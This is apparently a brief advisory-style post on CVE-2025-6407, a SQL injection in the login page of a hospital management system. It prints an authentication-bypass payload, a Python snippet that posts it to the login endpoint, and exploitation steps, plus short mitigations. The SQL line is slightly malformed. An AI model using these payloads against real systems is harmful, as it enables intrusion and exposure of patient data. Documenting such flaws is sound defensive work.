Listen to this Post
How CVE-2025-6407 Works
This critical SQL injection vulnerability exists in Campcodes Online Hospital Management System 1.0 within the `/user-login.php` file. The flaw occurs due to improper sanitization of the `Username` parameter during authentication. Attackers can craft malicious SQL queries by injecting payloads through this input field, allowing unauthorized database access. The vulnerability is remotely exploitable without authentication (AV:N/AC:L) and affects confidentiality, integrity, and availability (VC:L/VI:L/VA:L). Successful exploitation could lead to complete database compromise, including sensitive patient records and system credentials.
DailyCVE Form
Platform: Campcodes OHMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-06-21
Prediction: Patch by 2025-07-15
What Undercode Say
SELECT FROM users WHERE username = 'admin' OR '1'='1' --';
import requests
payload = {"Username":"admin'--","Password":"any"}
requests.post("http://target/user-login.php", data=payload)
How Exploit
1. Craft SQLi payload for Username field
2. Bypass authentication
3. Extract database contents
4. Elevate privileges
Protection from this CVE
1. Parameterized queries
2. Input validation
3. WAF rules
Impact
1. Data breach
2. System compromise
3. Patient privacy violation
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
